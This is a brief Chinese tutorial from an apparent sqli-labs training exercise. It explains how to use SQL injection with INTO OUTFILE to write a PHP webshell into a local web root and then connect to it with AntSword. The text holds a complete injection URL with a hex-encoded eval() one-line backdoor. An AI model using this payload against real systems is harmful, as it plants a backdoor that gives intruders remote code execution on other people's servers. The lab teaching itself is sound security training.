写入木马的前提(缺一不可):
1.root 权限
2.绝对路径
3.secure_file_priv=null
在配置文件中将
写入第三个条件:
以sqli-labs靶场1为例:
首先进入SQL注入漏洞点结合联合查询语句写入一句话木马:
一句话木马:
http://127.0.0.1/sqli-labs/Less-2/?id=1 union select 1,2,0x3c3f706870206576616c28245f524551554553545b27373837275d293b3f3e into outfile 'C:/phpstudy_2016/WWW/lly.php';--
成功写入:
使用蚁剑尝试连接:
连接成功。
练习:使用sql注入漏洞手工写入webshell,要求一句话木马链接密钥为自己姓名的缩写
以sqli-labs靶场2为练习(练习操作同上没什么区别可不看):
写入webshell(一句话木马):
一句话木马密码是本名: